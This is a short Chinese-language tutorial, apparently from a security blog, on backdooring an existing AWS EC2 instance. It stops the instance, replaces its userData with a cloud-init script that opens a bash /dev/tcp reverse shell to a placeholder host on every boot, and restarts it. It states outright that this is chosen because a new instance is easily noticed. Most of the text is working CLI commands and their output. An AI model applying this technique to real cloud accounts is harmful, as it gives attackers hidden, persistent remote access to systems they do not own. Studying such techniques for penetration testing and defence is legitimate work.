建立新的EC2 instance做reverse shell並不一直是一個好的主意,首先,新啟動一個EC2很容易被發現。
利用現有instance
必須要有的權限:
ec2:DescribeInstances
ec2:ModifyInstanceAttribute
首先,先暫停ec2,沒有暫停不能修改
1
|
> aws ec2 stop-instances --instance-ids {EC2_INSTANCE_IP}
|
沒暫停的Output
1
|
An error occurred (IncorrectInstanceState) when calling the ModifyInstanceAttribute operation: The instance 'i-XXXXXXXXXXXX' is not in the 'stopped' state.
|
成功暫停的Output
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
{
"StoppingInstances": [
{
"CurrentState": {
"Code": 64,
"Name": "stopping"
},
"InstanceId": "i-XXXXXXXXXXXX",
"PreviousState": {
"Code": 16,
"Name": "running"
}
}
]
}
|
Build blackdoor.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
echo "Hello World" >> /home/ubuntu/hello.txt # 這行是測試用的
/bin/bash -i >& /dev/tcp/IP/PORT 0>&1 # Reverse shell範例
--//
|
base64 encode
1
|
> base64 -i blackdoor.sh > blackdoor_encoded.sh # 這是Mac寫法,其他作業系統不要抄錯了
|
Modify instance attribute
1
2
3
4
|
> aws ec2 modify-instance-attribute \
--instance-id i-XXXXXXXXXXXX \
--attribute userData \
--value file://blackdoor_encoded.sh
|
Start EC2 instance
1
|
> aws ec2 start-instances --instance-ids i-09d20a0b2b49d77cc
|
Output
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
{
"StartingInstances": [
{
"CurrentState": {
"Code": 0,
"Name": "pending"
},
"InstanceId": "i-XXXXXXXXXX",
"PreviousState": {
"Code": 80,
"Name": "stopped"
}
}
]
}
|
等狀態是執行中或是running的時候就可以進去EC2查看
檢查
/var/log/cloud-init-output.log有沒有出現錯誤